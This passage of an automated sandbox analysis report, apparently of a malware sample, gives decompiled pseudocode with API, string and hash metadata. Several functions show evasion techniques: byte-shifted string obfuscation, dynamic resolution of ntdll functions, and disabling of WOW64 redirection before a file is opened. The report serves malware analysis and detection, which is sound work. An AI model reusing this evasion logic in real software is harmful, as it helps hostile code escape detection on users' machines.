												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t82 = _t130 + 1;
												_t108 =  *_t82;
												 *_t130 = _t108;
												_t130 = _t82;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E0042DFDC(_t93);
								E004214E2(_t93);
								E004214E2(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E004214E2(_v8);
								return _v16;
							}
							E004214E2();
							goto L12;
						}
						E004214E2(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0x44b7b8;
					L21:
					_t59 =  *(_t123 + 0x80);
					if(_t59 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t59 | 0xffffffff) == 0) {
							E004214E2( *((intOrPtr*)(_t123 + 0x7c)));
							E004214E2( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}

0x0042e045
0x0042e04f
0x0042e055
0x0042e058
0x0042e061
0x0042e080
0x0042e088
0x0042e08e
0x0042e0a1
0x0042e0a2
0x0042e0ab
0x0042e0ad
0x0042e0b0
0x0042e0b3
0x0042e0bc
0x0042e0cd
0x0042e0cf
0x0042e0d8
0x0042e22a
0x0042e22f
0x0042e231
0x0042e236
0x0042e239
0x0042e23e
0x0042e241
0x0042e246
0x0042e249
0x0042e24e
0x0042e1ba
0x0042e1c0
0x0042e1c4
0x0042e1c6
0x0042e1c6
0x00000000
0x0042e1c4
0x0042e0e5
0x0042e0e9
0x0042e0ec
0x0042e0f3
0x0042e0f6
0x0042e103
0x0042e109
0x0042e115
0x0042e11a
0x0042e129
0x0042e130
0x0042e13d
0x0042e151
0x0042e15b
0x0042e172
0x0042e19e
0x0042e1ae
0x0042e1ae
0x0042e1b2
0x00000000
0x00000000
0x0042e1a3
0x0042e1a3
0x0042e1a9
0x0042e217
0x0042e1ad
0x0042e1ad
0x00000000
0x0042e1ad
0x0042e219
0x0042e21b
0x0042e21b
0x0042e21e
0x0042e220
0x0042e222
0x0042e224
0x00000000
0x0042e228
0x0042e1ab
0x00000000
0x0042e1ab
0x0042e1b4
0x0042e1b7
0x00000000
0x0042e1b7
0x0042e175
0x0042e17b
0x0042e183
0x0042e18b
0x0042e18f
0x0042e193
0x00000000
0x0042e19b
0x0042e0f8
0x00000000
0x0042e0fd
0x0042e0bf
0x00000000
0x0042e0c7
0x00000000
0x0042e06b
0x0042e06b
0x0042e06d
0x0042e070
0x0042e1c8
0x0042e1c8
0x0042e1d0
0x0042e1d2
0x0042e1d2
0x0042e1da
0x0042e1df
0x0042e1e3
0x0042e1e8
0x0042e1f3
0x0042e1f9
0x0042e1e3
0x0042e1fd
0x0042e202
0x0042e208
0x00000000
0x0042e208

APIs

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00425351,00000001,00000364,00000005,000000FF,?,00416C35,?,?,1FFFFFFF,00000008), ref: 00420F3F

Part of subcall function 0042151C: RtlAllocateHeap.NTDLL(00000000,0041370C,?,?,00416C35,?,?,1FFFFFFF,00000008,?,00413478,0041370C,?,?,?,?), ref: 0042154E

_free.LIBCMT ref: 0042E0B3

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

_free.LIBCMT ref: 0042E0BF
_free.LIBCMT ref: 0042E0EC
_free.LIBCMT ref: 0042E0F8

Part of subcall function 00429F96: _free.LIBCMT ref: 0042A001
Part of subcall function 00429F96: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 0042A03C
Part of subcall function 00429F96: _free.LIBCMT ref: 0042A0AB

Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042DFF4
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E006
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E018
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E02A
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E03C

_free.LIBCMT ref: 0042E17B
_free.LIBCMT ref: 0042E183
_free.LIBCMT ref: 0042E193
_free.LIBCMT ref: 0042E1E8
_free.LIBCMT ref: 0042E1F3

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: _free$Heap$AllocateErrorLast$Free
String ID:
API String ID: 3082460183-0
Opcode ID: ca315950be3b9c5798fa720554809512d8c2b0e30ad5074d1cdd24bc5e01c153
Instruction ID: 0f1294884e81f9638cde155918d6ec2f198de150c42a923dd41d9ccdcb119e57
Opcode Fuzzy Hash: ca315950be3b9c5798fa720554809512d8c2b0e30ad5074d1cdd24bc5e01c153
Instruction Fuzzy Hash: 0D61F571A003259FDB20DF66E881BAAB7E8EF54310FA0416FE845DB291EB749D41CB58

Uniqueness

Uniqueness Score: 0.14%

Function 0042E045, Relevance: 13.7, APIs: 9, Instructions: 201COMMON

Download Yara Rule

APIs

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00420F3F

Part of subcall function 0042151C: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0042154E

_free.LIBCMT ref: 0042E0B3

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

_free.LIBCMT ref: 0042E0BF
_free.LIBCMT ref: 0042E0EC
_free.LIBCMT ref: 0042E0F8

Part of subcall function 00429F96: _free.LIBCMT ref: 0042A001
Part of subcall function 00429F96: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 0042A03C
Part of subcall function 00429F96: _free.LIBCMT ref: 0042A0AB

Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042DFF4
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E006
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E018
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E02A
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E03C

_free.LIBCMT ref: 0042E17B
_free.LIBCMT ref: 0042E183
_free.LIBCMT ref: 0042E193
_free.LIBCMT ref: 0042E1E8
_free.LIBCMT ref: 0042E1F3

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: _free$Heap$AllocateErrorLast$Free
String ID:
API String ID: 3082460183-0
Opcode ID: cb236575b7905dc78e8954f4e4e4fa32ec82d6d5802b8145ab96bc287c010dd1
Instruction ID: 0f1294884e81f9638cde155918d6ec2f198de150c42a923dd41d9ccdcb119e57
Opcode Fuzzy Hash: cb236575b7905dc78e8954f4e4e4fa32ec82d6d5802b8145ab96bc287c010dd1
Instruction Fuzzy Hash: 0D61F571A003259FDB20DF66E881BAAB7E8EF54310FA0416FE845DB291EB749D41CB58

Uniqueness

Uniqueness Score: 0.14%

Function 004102FA, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 221
fileUNIQUE

Download Yara Rule

C-Code - Quality: 75%

			E004102FA(void* __eflags, WCHAR* _a4, signed int _a8, long* _a12, void** _a16) {
				long _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				long _v24;
				long _v28;
				long _v32;
				long _v34;
				short _v36;
				long _v37;
				char _v38;
				short _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				signed int _v58;
				signed int _v60;
				signed int _v62;
				short _v64;
				short _v66;
				signed int _v68;
				signed int _v70;
				short _v72;
				short _v74;
				char _v76;
				short _t59;
				short _t60;
				short _t61;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				signed int _t72;
				signed int _t75;
				char* _t89;
				signed int _t91;
				char* _t92;
				char* _t93;
				signed int _t95;
				char* _t96;
				long _t99;
				signed int _t101;
				short _t102;
				signed int _t112;
				signed int _t114;
				void* _t118;
				signed int _t120;
				long* _t121;

				_t59 = 0x6e;
				_v76 = _t59;
				_t60 = 0x74;
				_t102 = 0x64;
				_t112 = 0x6c;
				_v74 = _t60;
				_t61 = 0x2e;
				_v66 = _t61;
				_v58 = 0;
				_v72 = _t102;
				_v70 = _t112;
				_v68 = _t112;
				_v64 = _t102;
				_v62 = _t112;
				_v60 = _t112;
				_t64 = E00410813(_t112,  &_v76);
				_t119 = _t64;
				_t117 = _t112;
				if((_t64 | _t112) != 0) {
					_t65 =  *0x4198f8; // 0x0
					__eflags = _t65 |  *0x4198fc;
					_t99 = 0;
					if((_t65 |  *0x4198fc) != 0) {
						L7:
						_t67 =  *0x419900; // 0x0
						__eflags = _t67 |  *0x419904;
						if((_t67 |  *0x419904) != 0) {
							L12:
							_t120 = _a8;
							_v8 = _t99;
							__eflags = _t120;
							if(_t120 != 0) {
								E0041071A( &_v8);
							}
							_t118 = CreateFileW(_a4, 0x80000000, _t99, _t99, 3, 0x80, _t99);
							__eflags = _t118 - 0xffffffff;
							if(_t118 != 0xffffffff) {
								_v24 = _t99;
								asm("cdq");
								_push(_t112);
								_push(_t118);
								_push(_t99);
								_push(0x1000000);
								_push(_t99);
								_push(2);
								_push(_t99);
								_push(_t99);
								_push(_t99);
								_push(_t99);
								_push(_t99);
								_v20 = _t99;
								asm("cdq");
								_t72 = E00410B1A( *0x4198f8,  *0x4198fc, 7,  &_v24, _t112, 6);
								__eflags = _t72 | _t112;
								if((_t72 | _t112) != 0) {
									L19:
									__eflags = _t120;
									if(_t120 != 0) {
										E00410A5F( &_v8);
									}
									CloseHandle(_t118);
									goto L22;
								}
								_push(_t99);
								_push(2);
								_push(_t99);
								_push(_t99);
								_push(_t99);
								_push(1);
								_v16 = _t99;
								asm("cdq");
								_push(_t112);
								_push( &_v32);
								_push(_t99);
								_push(_t99);
								_push(_t99);
								_push(_t99);
								_push(_t99);
								_push(_t99);
								_v12 = _t99;
								asm("cdq");
								_push(_t112);
								_push( &_v16);
								_push(0xffffffff);
								_v32 = _t99;
								_v28 = _t99;
								E00410B1A( *0x419900,  *0x419904, 0xa, _v24, _v20, 0xffffffff);
								_t114 = _v16;
								_t101 = _v12;
								__eflags = _t114 | _t101;
								if((_t114 | _t101) != 0) {
									__eflags = _t120;
									if(_t120 != 0) {
										E00410A5F( &_v8);
										_t101 = _v12;
										_t114 = _v16;
									}
									_t121 = _a12;
									_t75 = _t114;
									 *_t121 = _v24;
									_t121[1] = _v20;
									 *_a16 = _t118;
									goto L26;
								}
								goto L19;
							} else {
								__eflags = _t120;
								if(_t120 != 0) {
									E00410A5F( &_v8);
								}
								L22:
								_t75 = 0;
								L26:
								return _t75;
							}
						}
						_v52 = 0x48345b35;
						_t23 =  &_v52; // 0x48345b35
						_t89 = _t23;
						_v48 = 0x4c503d57;
						_v44 = 0x3a4d365e;
						_v40 = 0x505b4a4c;
						_v36 = 0x5556;
						_v34 = _t99;
						do {
							 *_t89 =  *_t89 + 0x19;
							_t89 = _t89 + 1;
							__eflags =  *_t89;
						} while (__eflags != 0);
						_t91 = E00410936(_t112, __eflags, _t119, _t117,  &_v52);
						__eflags = _v52;
						 *0x419900 = _t91;
						_t92 =  &_v52;
						 *0x419904 = _t112;
						if(_v52 == 0) {
							goto L12;
						} else {
							goto L11;
						}
						do {
							L11:
							 *_t92 =  *_t92 + 0xe7;
							_t92 = _t92 + 1;
							__eflags =  *_t92;
						} while ( *_t92 != 0);
						goto L12;
					}
					_v52 = 0x592a5b35;
					_t13 =  &_v52; // 0x592a5b35
					_t93 = _t13;
					_v48 = 0x4c5b484c;
					_v44 = 0x5b4a4c3a;
					_v40 = 0x5650;
					_v38 = 0x55;
					_v37 = _t99;
					do {
						 *_t93 =  *_t93 + 0x19;
						_t93 = _t93 + 1;
						__eflags =  *_t93;
					} while (__eflags != 0);
					_t19 =  &_v52; // 0x592a5b35
					_t95 = E00410936(_t112, __eflags, _t119, _t117, _t19);
					__eflags = _v52;
					 *0x4198f8 = _t95;
					_t96 =  &_v52;
					 *0x4198fc = _t112;
					if(_v52 == 0) {
						goto L7;
					} else {
						goto L6;
					}
					do {
						L6:
						 *_t96 =  *_t96 + 0xe7;
						_t96 = _t96 + 1;
						__eflags =  *_t96;
					} while ( *_t96 != 0);
					goto L7;
				}
				return 0;
			}

0x00410304
0x00410307
0x0041030b
0x0041030e
0x00410311
0x00410312
0x00410318
0x00410319
0x0041031f
0x00410326
0x0041032a
0x0041032e
0x00410332
0x00410336
0x0041033a
0x0041033e
0x00410343
0x00410345
0x0041034b
0x00410356
0x0041035b
0x00410364
0x00410365
0x004103bd
0x004103bd
0x004103c2
0x004103c8
0x00410423
0x00410423
0x00410426
0x00410429
0x0041042b
0x00410431
0x00410436
0x0041044f
0x00410451
0x00410454
0x0041046f
0x00410472
0x00410473
0x00410474
0x00410475
0x00410476
0x0041047b
0x0041047c
0x0041047e
0x0041047f
0x00410480
0x00410481
0x00410482
0x00410488
0x0041048b
0x0041049c
0x004104a4
0x004104a6
0x004104fa
0x004104fa
0x004104fc
0x00410502
0x00410507
0x00410509
0x00000000
0x00410509
0x004104a8
0x004104a9
0x004104ab
0x004104ac
0x004104ad
0x004104ae
0x004104b3
0x004104b6
0x004104b7
0x004104b8
0x004104b9
0x004104ba
0x004104bb
0x004104bc
0x004104bd
0x004104be
0x004104c2
0x004104c5
0x004104c6
0x004104c7
0x004104c8
0x004104cf
0x004104d5
0x004104e6
0x004104eb
0x004104f1
0x004104f6
0x004104f8
0x00410515
0x00410517
0x0041051d
0x00410522
0x00410525
0x00410528
0x00410529
0x0041052c
0x00410533
0x00410538
0x0041053e
0x00000000
0x0041053e
0x00000000
0x00410456
0x00410456
0x00410458
0x00410462
0x00410467
0x0041050f
0x0041050f
0x00410540
0x00000000
0x00410540
0x00410454
0x004103ca
0x004103d1
0x004103d1
0x004103d4
0x004103db
0x004103e2
0x004103e9
0x004103ef
0x004103f2
0x004103f2
0x004103f5
0x004103f6
0x004103f6
0x00410401
0x00410406
0x0041040a
0x0041040f
0x00410412
0x00410418
0x00000000
0x00000000
0x00000000
0x00000000
0x0041041a
0x0041041a
0x0041041a
0x0041041d
0x0041041e
0x0041041e
0x00000000
0x0041041a
0x00410367
0x0041036e
0x0041036e
0x00410371
0x00410378
0x0041037f
0x00410385
0x00410389
0x0041038c
0x0041038c
0x0041038f
0x00410390
0x00410390
0x00410395
0x0041039b
0x004103a0
0x004103a4
0x004103a9
0x004103ac
0x004103b2
0x00000000
0x00000000
0x00000000
0x00000000
0x004103b4
0x004103b4
0x004103b4
0x004103b7
0x004103b8
0x004103b8
0x00000000
0x004103b4
0x00000000

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00410449
CloseHandle.KERNEL32(00000000), ref: 00410509

Part of subcall function 00410A5F: GetModuleHandleW.KERNEL32(?,Wow64R), ref: 00410AFA
Part of subcall function 00410A5F: GetProcAddress.KERNEL32(00000000), ref: 00410B01

Part of subcall function 0041071A: GetModuleHandleW.KERNEL32(?,Wow64Disab), ref: 004107AD
Part of subcall function 0041071A: GetProcAddress.KERNEL32(00000000), ref: 004107B4

Strings

5[*Y, xrefs: 0041036E
W=PL, xrefs: 004103D4
^6M:, xrefs: 004103DB
VU, xrefs: 004103E9
LJ[P, xrefs: 004103E2

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Handle$AddressModuleProc$CloseCreateFile
String ID: 5[*Y$LJ[P$VU$W=PL$^6M:
API String ID: 2045340482-3709768329
Opcode ID: 69e68bfd6ffe313d965d2f6555efcac2d5c7aac8de985bbd3253009015e5576e
Instruction ID: 993edbcdf5cb8b07144be1bdae630442d780921531a5516e50ba4bb15b549bb1
Opcode Fuzzy Hash: 69e68bfd6ffe313d965d2f6555efcac2d5c7aac8de985bbd3253009015e5576e
Instruction Fuzzy Hash: 17719FB1D1021CBEDB11DFA0DC80AEEBBB9EF54714F14816AE915A7390E3B45D818B68

Uniqueness

Uniqueness Score: 100.00%

Function 00407871, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 93
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 19%

			E00407871(char _a4) {
				CHAR* _v8;
				CHAR* _v12;
				CHAR* _v16;
				CHAR* _v20;
				struct HINSTANCE__* _v24;
				intOrPtr _v28;

				do {
					_v8 = 0x415f5c;
					while(1) {
						_t2 =  &_v8; // 0x415f5c
						if( *((char*)( *_t2)) == 0) {
							goto L4;
						}
						_t3 =  &_v8; // 0x415f5c
						_t4 =  &_v8; // 0x415f5c
						 *((char*)( *_t4)) =  *((char*)( *_t3)) + 0x19;
						_t5 =  &_v8; // 0x415f5c
						_v8 =  *_t5 + 1;
					}
					L4:
				} while (0 != 0);
				_v24 = LoadLibraryA(0x415f5c);
				do {
					_v12 = 0x415f5c;
					while(1) {
						_t9 =  &_v12; // 0x415f5c
						if( *((char*)( *_t9)) == 0) {
							goto L9;
						}
						_t10 =  &_v12; // 0x415f5c
						_t11 =  &_v12; // 0x415f5c
						 *((char*)( *_t11)) =  *((char*)( *_t10)) - 0x19;
						_t12 =  &_v12; // 0x415f5c
						_v12 =  *_t12 + 1;
					}
					L9:
				} while (0 != 0);
				if(_v24 != 0) {
					do {
						_v16 = 0x415f68;
						while(1) {
							_t16 =  &_v16; // 0x415f68
							if( *((char*)( *_t16)) == 0) {
								goto L15;
							}
							_t17 =  &_v16; // 0x415f68
							_t18 =  &_v16; // 0x415f68
							 *((char*)( *_t18)) =  *((char*)( *_t17)) + 0x19;
							_t19 =  &_v16; // 0x415f68
							_v16 =  *_t19 + 1;
						}
						L15:
					} while (0 != 0);
					 *0x4198b0 = GetProcAddress(_v24, 0x415f68);
					do {
						_v20 = 0x415f68;
						while(1) {
							_t23 =  &_v20; // 0x415f68
							if( *((char*)( *_t23)) == 0) {
								goto L20;
							}
							_t24 =  &_v20; // 0x415f68
							_t25 =  &_v20; // 0x415f68
							 *((char*)( *_t25)) =  *((char*)( *_t24)) - 0x19;
							_t26 =  &_v20; // 0x415f68
							_v20 =  *_t26 + 1;
						}
						L20:
					} while (0 != 0);
					_t28 =  &_a4; // 0x415f5c
					_v28 =  *0x4198b0(0x411830, 0x411440, _t28);
					return _v28;
				}
				return 0xff;
			}

0x00407877
0x00407877
0x0040787e
0x0040787e
0x00407886
0x00000000
0x00000000
0x00407888
0x00407891
0x00407894
0x00407896
0x0040789a
0x0040789a
0x0040789f
0x0040789f
0x004078ae
0x004078b1
0x004078b1
0x004078b8
0x004078b8
0x004078c0
0x00000000
0x00000000
0x004078c2
0x004078cb
0x004078ce
0x004078d0
0x004078d4
0x004078d4
0x004078d9
0x004078d9
0x004078e1
0x004078ed
0x004078ed
0x004078f4
0x004078f4
0x004078fc
0x00000000
0x00000000
0x004078fe
0x00407907
0x0040790a
0x0040790c
0x00407910
0x00407910
0x00407915
0x00407915
0x00407927
0x0040792c
0x0040792c
0x00407933
0x00407933
0x0040793b
0x00000000
0x00000000
0x0040793d
0x00407946
0x00407949
0x0040794b
0x0040794f
0x0040794f
0x00407954
0x00407954
0x00407958
0x00407979
0x00000000
0x0040797c
0x00000000

APIs

LoadLibraryA.KERNEL32(00415F5C), ref: 004078A8
GetProcAddress.KERNEL32(00000000,00415F68), ref: 00407921

Strings

h_A\_A\_A, xrefs: 004078F4, 004078FE, 00407907, 0040790C
\_A\_A, xrefs: 004078B8, 004078C2, 004078CB, 004078D0
\_A\_A, xrefs: 00407958, 0040795B
\_A, xrefs: 0040787E, 00407888, 00407891, 00407896
h_Ah_A\_A\_A, xrefs: 00407933, 0040793D, 00407946, 0040794B

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: \_A$\_A\_A$\_A\_A$h_A\_A\_A$h_Ah_A\_A\_A
API String ID: 2574300362-2186164863
Opcode ID: 1bdb1927c64e7001bd94557f585b934e2eb28673f557a802058cd182f603f297
Instruction ID: 679d2501aa06df85c87ee4426c0679be07bb947e974e0cb2816099aab3969e86
Opcode Fuzzy Hash: 1bdb1927c64e7001bd94557f585b934e2eb28673f557a802058cd182f603f297
Instruction Fuzzy Hash: 24313C71D08289DFDB01DFA8C8445AEBBF4AF06305F1880A7D861E7291D738EA42CB59

Uniqueness

Uniqueness Score: 100.00%

Function 0040775F, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 93
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 19%

			E0040775F(char _a4) {
				CHAR* _v8;
				CHAR* _v12;
				CHAR* _v16;
				CHAR* _v20;
				struct HINSTANCE__* _v24;
				intOrPtr _v28;

				do {
					_v8 = 0x415f5c;
					while(1) {
						_t2 =  &_v8; // 0x415f5c
						if( *((char*)( *_t2)) == 0) {
							goto L4;
						}
						_t3 =  &_v8; // 0x415f5c
						_t4 =  &_v8; // 0x415f5c
						 *((char*)( *_t4)) =  *((char*)( *_t3)) + 0x19;
						_t5 =  &_v8; // 0x415f5c
						_v8 =  *_t5 + 1;
					}
					L4:
				} while (0 != 0);
				_v24 = LoadLibraryA(0x415f5c);
				do {
					_v12 = 0x415f5c;
					while(1) {
						_t9 =  &_v12; // 0x415f5c
						if( *((char*)( *_t9)) == 0) {
							goto L9;
						}
						_t10 =  &_v12; // 0x415f5c
						_t11 =  &_v12; // 0x415f5c
						 *((char*)( *_t11)) =  *((char*)( *_t10)) - 0x19;
						_t12 =  &_v12; // 0x415f5c
						_v12 =  *_t12 + 1;
					}
					L9:
				} while (0 != 0);
				if(_v24 != 0) {
					do {
						_v16 = 0x415f68;
						while(1) {
							_t16 =  &_v16; // 0x415f68
							if( *((char*)( *_t16)) == 0) {
								goto L15;
							}
							_t17 =  &_v16; // 0x415f68
							_t18 =  &_v16; // 0x415f68
							 *((char*)( *_t18)) =  *((char*)( *_t17)) + 0x19;
							_t19 =  &_v16; // 0x415f68
							_v16 =  *_t19 + 1;
						}
						L15:
					} while (0 != 0);
					 *0x4198b0 = GetProcAddress(_v24, 0x415f68);
					do {
						_v20 = 0x415f68;
						while(1) {
							_t23 =  &_v20; // 0x415f68
							if( *((char*)( *_t23)) == 0) {
								goto L20;
							}
							_t24 =  &_v20; // 0x415f68
							_t25 =  &_v20; // 0x415f68
							 *((char*)( *_t25)) =  *((char*)( *_t24)) - 0x19;
							_t26 =  &_v20; // 0x415f68
							_v20 =  *_t26 + 1;
						}
						L20:
					} while (0 != 0);
					_t28 =  &_a4; // 0x415f5c
					_v28 =  *0x4198b0(0x411830, 0x41140c, _t28);
					return _v28;
				}
				return 0xff;
			}

0x00407765
0x00407765
0x0040776c
0x0040776c
0x00407774
0x00000000
0x00000000
0x00407776
0x0040777f
0x00407782
0x00407784
0x00407788
0x00407788
0x0040778d
0x0040778d
0x0040779c
0x0040779f
0x0040779f
0x004077a6
0x004077a6
0x004077ae
0x00000000
0x00000000
0x004077b0
0x004077b9
0x004077bc
0x004077be
0x004077c2
0x004077c2
0x004077c7
0x004077c7
0x004077cf
0x004077db
0x004077db
0x004077e2
0x004077e2
0x004077ea
0x00000000
0x00000000
0x004077ec
0x004077f5
0x004077f8
0x004077fa
0x004077fe
0x004077fe
0x00407803
0x00407803
0x00407815
0x0040781a
0x0040781a
0x00407821
0x00407821
0x00407829
0x00000000
0x00000000
0x0040782b
0x00407834
0x00407837
0x00407839
0x0040783d
0x0040783d
0x00407842
0x00407842
0x00407846
0x00407867
0x00000000
0x0040786a
0x00000000

APIs

LoadLibraryA.KERNEL32(00415F5C), ref: 00407796
GetProcAddress.KERNEL32(00000000,00415F68), ref: 0040780F

Strings

h_Ah_A\_A\_A, xrefs: 00407821, 0040782B, 00407834, 00407839
\_A\_A, xrefs: 004077A6, 004077B0, 004077B9, 004077BE
\_A, xrefs: 0040776C, 00407776, 0040777F, 00407784
h_A\_A\_A, xrefs: 004077E2, 004077EC, 004077F5, 004077FA
\_A\_A, xrefs: 00407846, 00407849

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: \_A$\_A\_A$\_A\_A$h_A\_A\_A$h_Ah_A\_A\_A
API String ID: 2574300362-2186164863
Opcode ID: e48dd4a6fd81ab4dec7fc63a3200adf1c5cc1b2baa7e43edeaf71fa765e88b85
Instruction ID: 09fcd0e005aa3f398f97e2445b641b440b5fbff26b0ca54d2bd07015ad7abb30
Opcode Fuzzy Hash: e48dd4a6fd81ab4dec7fc63a3200adf1c5cc1b2baa7e43edeaf71fa765e88b85
Instruction Fuzzy Hash: 79315070E08249DFCB01DFA8C8845AEBFF4AB06345F1884ABD451E7391D738AA41CB5A

Uniqueness

Uniqueness Score: 100.00%

Function 0040BEA4, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 80
libraryloaderstringUNIQUE

Download Yara Rule

C-Code - Quality: 82%

			E0040BEA4(WCHAR* _a4, intOrPtr _a8, char _a16) {
				char _v6;
				short _v8;
				intOrPtr _v12;
				char _v15;
				char _v16;
				intOrPtr _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				void* _t27;
				short _t28;
				short _t29;
				short _t30;
				void* _t35;
				_Unknown_base(*)()* _t36;
				struct HINSTANCE__* _t41;
				short _t44;
				short _t47;
				void* _t48;

				_t27 = E0040C6BA(4 + (lstrlenW(_a4) + _a8) * 2);
				_t48 = _t27;
				if(_t48 != 0) {
					_t28 = 0x6e;
					_v40 = _t28;
					_t29 = 0x74;
					_t44 = 0x64;
					_t47 = 0x6c;
					_v38 = _t29;
					_t30 = 0x2e;
					_v30 = _t30;
					_v22 = 0;
					_v36 = _t44;
					_v34 = _t47;
					_v32 = _t47;
					_v28 = _t44;
					_v26 = _t47;
					_v24 = _t47;
					_t41 = GetModuleHandleW( &_v40);
					if(_t41 == 0) {
						L5:
						E0040C6D1(_t48);
						_t35 = 0;
						L7:
						return _t35;
					}
					_t36 =  *0x4198c4; // 0x0
					_v16 = 0x7773765f;
					_v12 = 0x6e697270;
					_v8 = 0x6674;
					_v6 = 0;
					if(_t36 != 0) {
						L6:
						_t23 =  &_a4; // 0x6e697270
						 *_t36(_t48,  *_t23,  &_a16);
						_t35 = _t48;
						goto L7;
					}
					_t20 =  &_v16; // 0x7773765f
					_t36 = GetProcAddress(_t41, _t20);
					 *0x4198c4 = _t36;
					if(_t36 != 0) {
						goto L6;
					}
					_t36 = GetProcAddress(_t41,  &_v15);
					 *0x4198c4 = _t36;
					if(_t36 != 0) {
						goto L6;
					}
					goto L5;
				}
				return _t27;
			}

0x0040bebf
0x0040bec4
0x0040bec9
0x0040bed2
0x0040bed5
0x0040bed9
0x0040bedc
0x0040bedf
0x0040bee0
0x0040bee6
0x0040bee7
0x0040beed
0x0040bef4
0x0040bef8
0x0040befc
0x0040bf00
0x0040bf04
0x0040bf08
0x0040bf12
0x0040bf16
0x0040bf61
0x0040bf62
0x0040bf68
0x0040bf7b
0x00000000
0x0040bf7b
0x0040bf18
0x0040bf1d
0x0040bf24
0x0040bf2b
0x0040bf31
0x0040bf37
0x0040bf6c
0x0040bf70
0x0040bf74
0x0040bf79
0x00000000
0x0040bf79
0x0040bf39
0x0040bf3e
0x0040bf44
0x0040bf4b
0x00000000
0x00000000
0x0040bf52
0x0040bf58
0x0040bf5f
0x00000000
0x00000000
0x00000000
0x0040bf5f
0x0040bf80

APIs

lstrlenW.KERNEL32(?,00000000,?,?,?,?,?,?,0040F337,?,00000000), ref: 0040BEAE

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

GetModuleHandleW.KERNEL32(?,7757BFA8,?,?,?,?,?,?,0040F337,?,00000000), ref: 0040BF0C
GetProcAddress.KERNEL32(00000000,_vswprintf), ref: 0040BF3E
GetProcAddress.KERNEL32(00000000,?), ref: 0040BF52

